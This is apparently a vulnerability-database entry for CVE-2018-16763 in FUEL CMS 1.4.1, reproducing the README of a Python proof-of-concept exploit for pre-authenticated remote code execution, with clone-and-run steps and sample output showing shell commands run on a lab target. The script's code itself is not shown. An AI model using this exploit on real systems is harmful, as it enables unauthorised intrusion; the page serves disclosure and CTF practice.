关联漏洞
标题:
FUEL CMS 注入漏洞
(CVE-2018-16763)
描述:FUEL CMS是一款基于Codelgniter框架的内容管理系统(CMS)。 FUEL CMS 1.4.1版本中的pages/select/页面的‘filter’参数和preview/页面的‘data’参数存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。
描述
A Proof-of-Concept (PoC) exploit for CVE-2018-16763 (Fuel CMS - Preauthenticated Remote Code Execution).
介绍
# CVE-2018-16763 Proof-of-Concept
A Proof-of-Concept (PoC) exploit for CVE-2018-16763 (Fuel CMS - Preauthenticated Remote Code Execution).
## Description
This Python 3 program serves as a PoC for the CVE-2018-16763 vulnerability in the Fuel CMS content management system. Specifically, the vulnerability allows for PHP Code Evaluation through the pages/select/filter parameter (implemented in this PoC), leading to Preauthenticated Remote Code Execution, a critical system vulnerability.
## Getting Started
### Dependencies
* Python 3 and the Python Standard Library
* The Open Source "git" Version Control System
* Other Python Packages/Modules (see requirements.txt for more details)
* CMD, PowerShell, Terminal, or some other Command Line Interface (CLI)
* A Windows, Linux, Unix, or macOS Operating System
### Installation
1. Download the git repository.
```
git clone https://gitlab.com/python-projects7372210/cve-2018-16763-proof-of-concept.git
```
2. Enter the git repository.
```
cd cve-2018-16763-proof-of-concept
```
3. Install the required packages and other dependencies.
```
python3 -m pip install -r requirements.txt
```
### Program Execution
Run the exploit script against a vulnerable target.
(ONLY RUN THE SCRIPT AGAINST A TARGET YOU OWN OR A TARGET PROVIDED BY TryHackMe, HackTheBox, OR ANOTHER ETHICAL HACKING WEBSITE!)
I would recommend checking out TryHackMe's "Ignite" Challenge for more details. You can also download the vulnerable Fuel CMS application from exploit-db.com.
```
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
```
## Help
* Are all of the dependencies present? If there are issues with conflicting dependencies, consider using a Python 3 virtual environment (https://docs.python.org/3/library/index.html).
* Is the target up?
* Is the target running Fuel CMS 1.4.1 or another version that is impacted by CVE-2018-16763?
```
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
```
## Authors
[formaljek14]
## Version History
* 0.1
* Initial Release
## License
This project is licensed under the MIT License - see the LICENSE.md file for details.
## Acknowledgments
Heavily inspired by Exploit-DB programs, Vozec's PoC scripts, and the original PoC developed by Padsala Trushal.
* [Exploit-DB](https://www.exploit-db.com)
* [Vozec](https://github.com/Vozec)
* [Padsala Trushal](https://github.com/padsalatushal)
文件快照
[4.0K] /data/pocs/f5f0d6d11e4889d1932dae72233bf79b49753bd4
├── [2.4K] CVE-2018-16763.py
├── [1.1K] LICENSE.md
├── [3.2K] README.md
└── [ 113] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。